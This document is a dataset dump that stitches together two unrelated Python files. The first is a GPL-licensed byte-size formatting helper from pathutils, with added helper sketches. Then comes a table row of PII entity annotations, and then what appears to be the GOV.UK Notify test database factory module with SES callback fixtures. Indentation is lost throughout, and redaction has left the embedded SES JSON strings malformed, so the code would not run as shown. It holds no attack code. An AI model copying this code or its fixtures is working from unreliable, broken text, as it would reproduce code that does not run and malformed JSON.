# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# from http://www.voidspace.org.uk/python/pathutils.html (BSD License)
def formatbytes(sizeint, configdict=None, **configs):
"""
Given a file size as an integer, return a nicely formatted string that
    represents the size. Has various options to control its output.
You can pass in a dictionary of arguments or keyword arguments. Keyword
arguments override the dictionary and there are sensible defaults for options
you don't set.
Options and defaults are as follows :
    * ``forcekb = False`` - If set, this forces the output to be in terms
of kilobytes and bytes only.
* ``largestonly = True`` - If set, instead of outputting
``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest
denominator - e.g. ``1.3 Mbytes`` or ``17.2 Kbytes``
* ``kiloname = 'Kbytes'`` - The string to use for kilobytes
* ``meganame = 'Mbytes'`` - The string to use for Megabytes
* ``bytename = 'bytes'`` - The string to use for bytes
    * ``nospace = True`` - If set, it outputs ``1Mbytes, 307Kbytes``,
notice there is no space.
Example outputs : ::
19Mbytes, 75Kbytes, 255bytes
2Kbytes, 0bytes
23.8Mbytes
.. note::
It currently uses the plural form even for singular.
"""
defaultconfigs = { 'forcekb' : False,
'largestonly' : True,
'kiloname' : 'Kbytes',
'meganame' : 'Mbytes',
'bytename' : 'bytes',
'nospace' : True}
if configdict is None:
configdict = {}
for entry in configs:
# keyword parameters override the dictionary passed in
configdict[entry] = configs[entry]
#
for keyword in defaultconfigs:
        if keyword not in configdict:
configdict[keyword] = defaultconfigs[keyword]
#
if configdict['nospace']:
space = ''
else:
space = ' '
#
mb, kb, rb = bytedivider(sizeint)
if configdict['largestonly']:
if mb and not configdict['forcekb']:
            return stringround(mb, kb) + space + configdict['meganame']
elif kb or configdict['forcekb']:
if mb and configdict['forcekb']:
kb += 1024*mb
            return stringround(kb, rb) + space + configdict['kiloname']
else:
return str(rb) + space + configdict['bytename']
else:
outstr = ''
if mb and not configdict['forcekb']:
            outstr = str(mb) + space + configdict['meganame'] + ', '
if kb or configdict['forcekb'] or mb:
if configdict['forcekb']:
kb += 1024*mb
            outstr += str(kb) + space + configdict['kiloname'] + ', '
return outstr + str(rb) + space + configdict['bytename']
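# bytedivider and stringround are called above but not defined in this excerpt;
# they come from the same pathutils module. The definitions below are a minimal
# sketch consistent with how formatbytes uses them, not the original code.
def bytedivider(nbytes):
    # Split a byte count into (whole megabytes, whole kilobytes, leftover bytes).
    mb, remainder = divmod(nbytes, 1024 * 1024)
    kb, rb = divmod(remainder, 1024)
    return mb, kb, rb

def stringround(main, rest):
    # Fold the next denomination down into a one-decimal string,
    # e.g. stringround(1, 307) -> '1.3'.
    return str(round(main + rest / 1024.0, 1))

# With the sketch above:
#   formatbytes(1 * 1024 * 1024 + 307 * 1024 + 255)   # -> '1.3Mbytes'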
| 3,822 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2006'], ['PERSON', 'José de Paula Eufrásio Junior'], ['PERSON', 'Yves Junqueira'], ['PERSON', 'Franklin St'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'Mbytes'], ['PERSON', 'largestonly'], ['PERSON', 'meganame'], ['PERSON', 'Mbytes'], ['LOCATION', 'stringround(mb'], ['URL', 'http://www.voidspace.org.uk/python/pathutils.html'], ['IP_ADDRESS', '\n \n '], ['IP_ADDRESS', 'e::\n \n '], ['URL', 'email.com'], ['URL', 'email.com']] |
99 | import random
import uuid
from datetime import date, datetime, timedelta
import pytest
from app import db
from app.dao import fact_processing_time_dao
from app.dao.email_branding_dao import dao_create_email_branding
from app.dao.inbound_sms_dao import dao_create_inbound_sms
from app.dao.invited_org_user_dao import save_invited_org_user
from app.dao.invited_user_dao import save_invited_user
from app.dao.jobs_dao import dao_create_job
from app.dao.notifications_dao import dao_create_notification
from app.dao.organisation_dao import (
dao_add_service_to_organisation,
dao_create_organisation,
)
from app.dao.permissions_dao import permission_dao
from app.dao.service_callback_api_dao import save_service_callback_api
from app.dao.service_data_retention_dao import insert_service_data_retention
from app.dao.service_inbound_api_dao import save_service_inbound_api
from app.dao.service_permissions_dao import dao_add_service_permission
from app.dao.service_sms_sender_dao import (
dao_update_service_sms_sender,
update_existing_sms_sender_with_inbound_number,
)
from app.dao.services_dao import dao_add_user_to_service, dao_create_service
from app.dao.templates_dao import dao_create_template, dao_update_template
from app.dao.users_dao import save_model_user
from app.models import (
EMAIL_TYPE,
KEY_TYPE_NORMAL,
LETTER_TYPE,
MOBILE_TYPE,
SMS_TYPE,
AnnualBilling,
ApiKey,
BroadcastEvent,
BroadcastMessage,
BroadcastProvider,
BroadcastProviderMessage,
BroadcastProviderMessageNumber,
BroadcastStatusType,
Complaint,
DailySortedLetter,
Domain,
EmailBranding,
FactBilling,
FactNotificationStatus,
FactProcessingTime,
InboundNumber,
InboundSms,
InvitedOrganisationUser,
InvitedUser,
Job,
LetterBranding,
LetterRate,
Notification,
NotificationHistory,
Organisation,
Permission,
Rate,
ReturnedLetter,
Service,
ServiceCallbackApi,
ServiceContactList,
ServiceEmailReplyTo,
ServiceGuestList,
ServiceInboundApi,
ServiceLetterContact,
ServicePermission,
ServiceSmsSender,
Template,
TemplateFolder,
User,
WebauthnCredential,
)
def create_user(
*,
mobile_number="+447700900986",
    email="dummy@email.com",
state='active',
id_=None,
name="Test User"
):
data = {
'id': id_ or uuid.uuid4(),
'name': name,
'email_address': email,
'password': 'password',
'mobile_number': mobile_number,
'state': state
}
user = User.query.filter_by(email_address=email).first()
if not user:
user = User(**data)
save_model_user(user, validated_email_access=True)
return user
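# Note: create_user reuses an existing User row with the same email address
# (User.query.filter_by) instead of inserting a duplicate, so repeated calls
# with the default email return the same user.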
def create_permissions(user, service, *permissions):
permissions = [
Permission(service_id=service.id, user_id=user.id, permission=p)
for p in permissions
]
permission_dao.set_user_service_permission(user, service, permissions, _commit=True)
def create_service(
user=None,
service_name="Sample service",
service_id=None,
restricted=False,
count_as_live=True,
service_permissions=None,
research_mode=False,
active=True,
email_from=None,
prefix_sms=True,
message_limit=1000,
organisation_type='central',
check_if_service_exists=False,
go_live_user=None,
go_live_at=None,
crown=True,
organisation=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
if check_if_service_exists:
service = Service.query.filter_by(name=service_name).first()
if (not check_if_service_exists) or (check_if_service_exists and not service):
service = Service(
name=service_name,
message_limit=message_limit,
restricted=restricted,
email_from=email_from if email_from else service_name.lower().replace(' ', '.'),
            created_by=user if user else create_user(email='dummy@email.com'),
prefix_sms=prefix_sms,
organisation_type=organisation_type,
organisation=organisation,
go_live_user=go_live_user,
go_live_at=go_live_at,
crown=crown,
purchase_order_number=purchase_order_number,
billing_contact_names=billing_contact_names,
billing_contact_email_addresses=billing_contact_email_addresses,
billing_reference=billing_reference,
)
dao_create_service(
service,
service.created_by,
service_id,
service_permissions=service_permissions,
)
service.active = active
service.research_mode = research_mode
service.count_as_live = count_as_live
else:
if user and user not in service.users:
dao_add_user_to_service(service, user)
return service
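# Illustrative usage (the names here are assumptions, not from the original file):
#   service = create_service(service_name='My Service')
#   service.email_from   # -> 'my.service', derived via lower().replace(' ', '.')
# With check_if_service_exists=True an existing service of the same name is
# reused and the given user is added to it instead of creating a new row.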
def create_service_with_inbound_number(
inbound_number='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
inbound = create_inbound_number(number=inbound_number, service_id=service.id)
update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender,
sms_sender=inbound_number,
inbound_number_id=inbound.id)
return service
def create_service_with_defined_sms_sender(
sms_sender_value='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
dao_update_service_sms_sender(service_id=service.id,
service_sms_sender_id=sms_sender.id,
is_default=True,
sms_sender=sms_sender_value)
return service
def create_template(
service,
template_type=SMS_TYPE,
template_name=None,
subject='Template subject',
content='Dear Sir/Madam, Hello. Yours Truly, The Government.',
reply_to=None,
hidden=False,
archived=False,
folder=None,
postage=None,
process_type='normal',
contact_block_id=None
):
data = {
'name': template_name or '{} Template Name'.format(template_type),
'template_type': template_type,
'content': content,
'service': service,
'created_by': service.created_by,
'reply_to': reply_to,
'hidden': hidden,
'folder': folder,
'process_type': process_type,
}
if template_type == LETTER_TYPE:
data["postage"] = postage or "second"
if contact_block_id:
data['service_letter_contact_id'] = contact_block_id
if template_type != SMS_TYPE:
data['subject'] = subject
template = Template(**data)
dao_create_template(template)
if archived:
template.archived = archived
dao_update_template(template)
return template
def create_notification(
template=None,
job=None,
job_row_number=None,
to_field=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
personalisation=None,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
scheduled_for=None,
normalised_to=None,
one_off=False,
reply_to_text=None,
created_by_id=None,
postage=None,
document_download_count=None,
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if to_field is None:
        to_field = '+447700900855' if template.template_type == SMS_TYPE else 'dummy@email.com'
if status not in ('created', 'validation-failed', 'virus-scan-failed', 'pending-virus-check'):
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if not one_off and (job is None and api_key is None):
# we did not specify in test - lets create it
api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first()
if not api_key:
api_key = create_api_key(template.service, key_type=key_type)
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': uuid.uuid4(),
'to': to_field,
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'personalisation': personalisation,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'normalised_to': normalised_to,
'reply_to_text': reply_to_text,
'created_by_id': created_by_id,
'postage': postage,
'document_download_count': document_download_count,
}
notification = Notification(**data)
dao_create_notification(notification)
return notification
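# Behaviour note: if neither job nor api_key is supplied (and one_off is False),
# the helper reuses the template service's existing API key of the requested
# key_type, creating one only when none exists. Illustrative call:
#   notification = create_notification(template=create_template(create_service()))
#   notification.api_key.key_type   # -> KEY_TYPE_NORMAL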
def create_notification_history(
template=None,
job=None,
job_row_number=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
created_by_id=None,
postage=None,
id=None
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if status != 'created':
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': id or uuid.uuid4(),
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'created_by_id': created_by_id,
'postage': postage
}
notification_history = NotificationHistory(**data)
db.session.add(notification_history)
db.session.commit()
return notification_history
def create_job(
template,
notification_count=1,
created_at=None,
job_status='pending',
scheduled_for=None,
processing_started=None,
processing_finished=None,
original_file_name='some.csv',
archived=False,
contact_list_id=None,
):
data = {
'id': uuid.uuid4(),
'service_id': template.service_id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'original_file_name': original_file_name,
'notification_count': notification_count,
'created_at': created_at or datetime.utcnow(),
'created_by': template.created_by,
'job_status': job_status,
'scheduled_for': scheduled_for,
'processing_started': processing_started,
'processing_finished': processing_finished,
'archived': archived,
'contact_list_id': contact_list_id,
}
job = Job(**data)
dao_create_job(job)
return job
def create_service_permission(service_id, permission=EMAIL_TYPE):
dao_add_service_permission(
service_id if service_id else create_service().id, permission)
service_permissions = ServicePermission.query.all()
return service_permissions
def create_inbound_sms(
service,
notify_number=None,
user_number='447700900111',
provider_date=None,
provider_reference=None,
content='Hello',
provider="mmg",
created_at=None
):
if not service.inbound_number:
create_inbound_number(
# create random inbound number
notify_number or '07{:09}'.format(random.randint(0, 1e9 - 1)),
provider=provider,
service_id=service.id
)
inbound = InboundSms(
service=service,
created_at=created_at or datetime.utcnow(),
notify_number=service.get_inbound_number(),
user_number=user_number,
provider_date=provider_date or datetime.utcnow(),
provider_reference=provider_reference or 'foo',
content=content,
provider=provider
)
dao_create_inbound_sms(inbound)
return inbound
def create_service_inbound_api(
service,
url="https://something.com",
bearer_token="some_super_secret",
):
service_inbound_api = ServiceInboundApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id
)
save_service_inbound_api(service_inbound_api)
return service_inbound_api
def create_service_callback_api(
service,
url="https://something.com",
bearer_token="some_super_secret",
callback_type="delivery_status"
):
service_callback_api = ServiceCallbackApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id,
callback_type=callback_type
)
save_service_callback_api(service_callback_api)
return service_callback_api
def create_email_branding(colour='blue', logo='test_x2.png', name='test_org_1', text='DisplayName'):
data = {
'colour': colour,
'logo': logo,
'name': name,
'text': text,
}
email_branding = EmailBranding(**data)
dao_create_email_branding(email_branding)
return email_branding
def create_rate(start_date, value, notification_type):
rate = Rate(
id=uuid.uuid4(),
valid_from=start_date,
rate=value,
notification_type=notification_type
)
db.session.add(rate)
db.session.commit()
return rate
def create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class='second'):
if start_date is None:
start_date = datetime(2016, 1, 1)
rate = LetterRate(
id=uuid.uuid4(),
start_date=start_date,
end_date=end_date,
crown=crown,
sheet_count=sheet_count,
rate=rate,
post_class=post_class
)
db.session.add(rate)
db.session.commit()
return rate
def create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None):
id_ = uuid.uuid4()
name = key_name if key_name else '{} api key {}'.format(key_type, id_)
api_key = ApiKey(
service=service,
name=name,
created_by=service.created_by,
key_type=key_type,
id=id_,
secret=uuid.uuid4()
)
db.session.add(api_key)
db.session.commit()
return api_key
def create_inbound_number(number, provider='mmg', active=True, service_id=None):
inbound_number = InboundNumber(
id=uuid.uuid4(),
number=number,
provider=provider,
active=active,
service_id=service_id
)
db.session.add(inbound_number)
db.session.commit()
return inbound_number
def create_reply_to_email(
service,
email_address,
is_default=True,
archived=False
):
data = {
'service': service,
'email_address': email_address,
'is_default': is_default,
'archived': archived,
}
reply_to = ServiceEmailReplyTo(**data)
db.session.add(reply_to)
db.session.commit()
return reply_to
def create_service_sms_sender(
service,
sms_sender,
is_default=True,
inbound_number_id=None,
archived=False
):
data = {
'service_id': service.id,
'sms_sender': sms_sender,
'is_default': is_default,
'inbound_number_id': inbound_number_id,
'archived': archived,
}
service_sms_sender = ServiceSmsSender(**data)
db.session.add(service_sms_sender)
db.session.commit()
return service_sms_sender
def create_letter_contact(
service,
contact_block,
is_default=True,
archived=False
):
data = {
'service': service,
'contact_block': contact_block,
'is_default': is_default,
'archived': archived,
}
letter_content = ServiceLetterContact(**data)
db.session.add(letter_content)
db.session.commit()
return letter_content
def create_annual_billing(
service_id, free_sms_fragment_limit, financial_year_start
):
annual_billing = AnnualBilling(
service_id=service_id,
free_sms_fragment_limit=free_sms_fragment_limit,
financial_year_start=financial_year_start
)
db.session.add(annual_billing)
db.session.commit()
return annual_billing
def create_domain(domain, organisation_id):
domain = Domain(domain=domain, organisation_id=organisation_id)
db.session.add(domain)
db.session.commit()
return domain
def create_organisation(
name='test_org_1',
active=True,
organisation_type=None,
domains=None,
organisation_id=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
data = {
'id': organisation_id,
'name': name,
'active': active,
'organisation_type': organisation_type,
'purchase_order_number': purchase_order_number,
'billing_contact_names': billing_contact_names,
'billing_contact_email_addresses': billing_contact_email_addresses,
'billing_reference': billing_reference,
}
organisation = Organisation(**data)
dao_create_organisation(organisation)
for domain in domains or []:
create_domain(domain, organisation.id)
return organisation
def create_invited_org_user(organisation, invited_by, email_address='dummy@email.com'):
invited_org_user = InvitedOrganisationUser(
email_address=email_address,
invited_by=invited_by,
organisation=organisation,
)
save_invited_org_user(invited_org_user)
return invited_org_user
def create_daily_sorted_letter(billing_day=None,
file_name="Notify-20180118123.rs.txt",
unsorted_count=0,
sorted_count=0):
daily_sorted_letter = DailySortedLetter(
billing_day=billing_day or date(2018, 1, 18),
file_name=file_name,
unsorted_count=unsorted_count,
sorted_count=sorted_count
)
db.session.add(daily_sorted_letter)
db.session.commit()
return daily_sorted_letter
def create_ft_billing(bst_date,
template,
*,
provider='test',
rate_multiplier=1,
international=False,
rate=0,
billable_unit=1,
notifications_sent=1,
postage='none'
):
data = FactBilling(bst_date=bst_date,
service_id=template.service_id,
template_id=template.id,
notification_type=template.template_type,
provider=provider,
rate_multiplier=rate_multiplier,
international=international,
rate=rate,
billable_units=billable_unit,
notifications_sent=notifications_sent,
postage=postage)
db.session.add(data)
db.session.commit()
return data
def create_ft_notification_status(
bst_date,
notification_type='sms',
service=None,
template=None,
job=None,
key_type='normal',
notification_status='delivered',
count=1
):
if job:
template = job.template
if template:
service = template.service
notification_type = template.template_type
else:
if not service:
service = create_service()
template = create_template(service=service, template_type=notification_type)
data = FactNotificationStatus(
bst_date=bst_date,
template_id=template.id,
service_id=service.id,
job_id=job.id if job else uuid.UUID(int=0),
notification_type=notification_type,
key_type=key_type,
notification_status=notification_status,
notification_count=count
)
db.session.add(data)
db.session.commit()
return data
def create_process_time(bst_date='2021-03-01', messages_total=35, messages_within_10_secs=34):
data = FactProcessingTime(
bst_date=bst_date,
messages_total=messages_total,
messages_within_10_secs=messages_within_10_secs
)
fact_processing_time_dao.insert_update_processing_time(data)
def create_service_guest_list(service, email_address=None, mobile_number=None):
if email_address:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address)
elif mobile_number:
guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number)
else:
        guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, 'dummy@email.com')
db.session.add(guest_list_user)
db.session.commit()
return guest_list_user
def create_complaint(service=None,
notification=None,
created_at=None):
if not service:
service = create_service()
if not notification:
template = create_template(service=service, template_type='email')
notification = create_notification(template=template)
complaint = Complaint(notification_id=notification.id,
service_id=service.id,
ses_feedback_id=str(uuid.uuid4()),
complaint_type='abuse',
complaint_date=datetime.utcnow(),
created_at=created_at if created_at else datetime.now()
)
db.session.add(complaint)
db.session.commit()
return complaint
def ses_complaint_callback_malformed_message_id():
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{"notificationType":"Complaint","complaint":{"complainedRecipients":[{"emailAddress":dummy@email.com"}],"timestamp":"2018-06-05T13:59:58.000Z","feedbackId":"ses_feedback_id"},"mail":{"timestamp":"2018-06-05T14:00:15.950Z","source":"\\"Some Service\\" <someservicenotifications.service.gov.uk>","sourceArn":"arn:identity/notifications.service.gov.uk","sourceIp":"127.0.0.1","sendingAccountId":"888450439860","badMessageId":"ref1","destination":[dummy@email.com"]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback_with_missing_complaint_type():
"""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
"""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{"notificationType":"Complaint","complaint":{"complainedRecipients":[{"emailAddress":dummy@email.com"}],"timestamp":"2018-06-05T13:59:58.000Z","feedbackId":"ses_feedback_id"},"mail":{"timestamp":"2018-06-05T14:00:15.950Z","source":"\\"Some Service\\" <someservicenotifications.service.gov.uk>","sourceArn":"arn:identity/notifications.service.gov.uk","sourceIp":"127.0.0.1","sendingAccountId":"888450439860","messageId":"ref1","destination":[dummy@email.com"]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback():
"""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
"""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{"notificationType":"Complaint","complaint":{"complaintFeedbackType": "abuse", "complainedRecipients":[{"emailAddress":dummy@email.com"}],"timestamp":"2018-06-05T13:59:58.000Z","feedbackId":"ses_feedback_id"},"mail":{"timestamp":"2018-06-05T14:00:15.950Z","source":"\\"Some Service\\" <someservicenotifications.service.gov.uk>","sourceArn":"arn:identity/notifications.service.gov.uk","sourceIp":"127.0.0.1","sendingAccountId":"888450439860","messageId":"ref1","destination":[dummy@email.com"]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_notification_callback():
return '{\n "Type" : "Notification",\n "MessageId" : "ref1",' \
'\n "TopicArn" : "arn:aws:sns:eu-west-1:123456789012:testing",' \
'\n "Message" : "{\\"notificationType\\":\\"Delivery\\",' \
'\\"mail\\":{\\"timestamp\\":\\"2016-03-14T12:35:25.909Z\\",' \
'\\"source\\":dummy@email.com",' \
'\\"sourceArn\\":\\"arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\",' \
'\\"sendingAccountId\\":\\"123456789012\\",' \
'\\"messageId\\":\\"ref1\\",' \
'\\"destination\\":dummy@email.com"]},' \
'\\"delivery\\":{\\"timestamp\\":\\"2016-03-14T12:35:26.567Z\\",' \
'\\"processingTimeMillis\\":658,' \
'\\"recipients\\":dummy@email.com"],' \
'\\"smtpResponse\\":\\"250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\",' \
'\\"reportingMTA\\":\\"a6-238.smtp-out.eu-west-1.amazonses.com\\"}}",' \
'\n "Timestamp" : "2016-03-14T12:35:26.665Z",\n "SignatureVersion" : "1",' \
'\n "Signature" : "X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt' \
'PI:KEY' \
'PI:KEY' \
'PI:KEY",' \
'\n "SigningCertURL" : "https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750' \
'dd426d95ee9390147a5624348ee.pem",' \
'\n "UnsubscribeURL" : "https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S' \
'PI:KEY"\n}'
def create_service_data_retention(
service,
notification_type='sms',
days_of_retention=3
):
data_retention = insert_service_data_retention(
service_id=service.id,
notification_type=notification_type,
days_of_retention=days_of_retention
)
return data_retention
def create_invited_user(service=None,
to_email_address=None):
if service is None:
service = create_service()
if to_email_address is None:
        to_email_address = 'dummy@email.com'
from_user = service.users[0]
data = {
'service': service,
'email_address': to_email_address,
'from_user': from_user,
'permissions': 'send_messages,manage_service,manage_api_keys',
'folder_permissions': [str(uuid.uuid4()), str(uuid.uuid4())]
}
invited_user = InvitedUser(**data)
save_invited_user(invited_user)
return invited_user
def create_template_folder(service, name='foo', parent=None):
tf = TemplateFolder(name=name, service=service, parent=parent)
db.session.add(tf)
db.session.commit()
return tf
def create_letter_branding(name='HM Government', filename='hm-government'):
test_domain_branding = LetterBranding(name=name,
filename=filename,
)
db.session.add(test_domain_branding)
db.session.commit()
return test_domain_branding
def set_up_usage_data(start_date):
year = int(start_date.strftime('%Y'))
one_week_earlier = start_date - timedelta(days=7)
two_days_later = start_date + timedelta(days=2)
one_week_later = start_date + timedelta(days=7)
one_month_later = start_date + timedelta(days=31)
# service with sms and letters:
service_1_sms_and_letter = create_service(
service_name='a - with sms and letter',
purchase_order_number="service purchase order number",
billing_contact_names="service billing contact names",
        billing_contact_email_addresses="dummy@email.com dummy@email.com",
billing_reference="service billing reference"
)
letter_template_1 = create_template(service=service_1_sms_and_letter, template_type='letter')
sms_template_1 = create_template(service=service_1_sms_and_letter, template_type='sms')
create_annual_billing(
service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year
)
org_1 = create_organisation(
name="Org for {}".format(service_1_sms_and_letter.name),
purchase_order_number="org1 purchase order number",
billing_contact_names="org1 billing contact names",
        billing_contact_email_addresses="dummy@email.com dummy@email.com",
billing_reference="org1 billing reference"
)
dao_add_service_to_organisation(
service=service_1_sms_and_letter,
organisation_id=org_1.id
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=1, rate=.35, postage='first')
create_ft_billing(bst_date=one_month_later, template=letter_template_1,
notifications_sent=4, billable_unit=2, rate=.45, postage='second')
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=2, rate=.45, postage='second')
# service with emails only:
service_with_emails = create_service(service_name='b - emails')
email_template = create_template(service=service_with_emails, template_type='email')
org_2 = create_organisation(
name='Org for {}'.format(service_with_emails.name),
)
dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id)
create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10)
# service with letters:
service_with_letters = create_service(service_name='c - letters only')
letter_template_3 = create_template(service=service_with_letters, template_type='letter')
org_for_service_with_letters = create_organisation(
name="Org for {}".format(service_with_letters.name),
purchase_order_number="org3 purchase order number",
billing_contact_names="org3 billing contact names",
        billing_contact_email_addresses="dummy@email.com dummy@email.com",
billing_reference="org3 billing reference"
)
dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id)
create_ft_billing(bst_date=start_date, template=letter_template_3,
notifications_sent=2, billable_unit=3, rate=.50, postage='first')
create_ft_billing(bst_date=one_week_later, template=letter_template_3,
notifications_sent=8, billable_unit=5, rate=.65, postage='second')
create_ft_billing(bst_date=one_month_later, template=letter_template_3,
notifications_sent=12, billable_unit=5, rate=.65, postage='second')
# service with letters, without an organisation:
service_with_letters_without_org = create_service(service_name='d - service without org')
letter_template_4 = create_template(service=service_with_letters_without_org, template_type='letter')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=7, billable_unit=4, rate=1.55, postage='rest-of-world')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=8, billable_unit=4, rate=1.55, postage='europe')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=2, billable_unit=1, rate=.35, postage='second')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=1, billable_unit=1, rate=.50, postage='first')
# service with chargeable SMS, without an organisation
service_with_sms_without_org = create_service(
service_name='b - chargeable sms',
purchase_order_number="sms purchase order number",
billing_contact_names="sms billing contact names",
        billing_contact_email_addresses="dummy@email.com dummy@email.com",
billing_reference="sms billing reference"
)
sms_template = create_template(service=service_with_sms_without_org, template_type='sms')
create_annual_billing(
service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12)
create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11)
# service with SMS within free allowance
service_with_sms_within_allowance = create_service(
service_name='e - sms within allowance'
)
sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type='sms')
create_annual_billing(
service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11)
# dictionary with services and orgs to return
return {
"org_1": org_1,
"service_1_sms_and_letter": service_1_sms_and_letter,
"org_2": org_2,
"service_with_emails": service_with_emails,
"org_for_service_with_letters": org_for_service_with_letters,
"service_with_letters": service_with_letters,
"service_with_letters_without_org": service_with_letters_without_org,
"service_with_sms_without_org": service_with_sms_without_org,
"service_with_sms_within_allowance": service_with_sms_within_allowance,
}
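# Illustrative usage (the argument value is an assumption):
#   fixtures = set_up_usage_data(datetime(2019, 4, 1))
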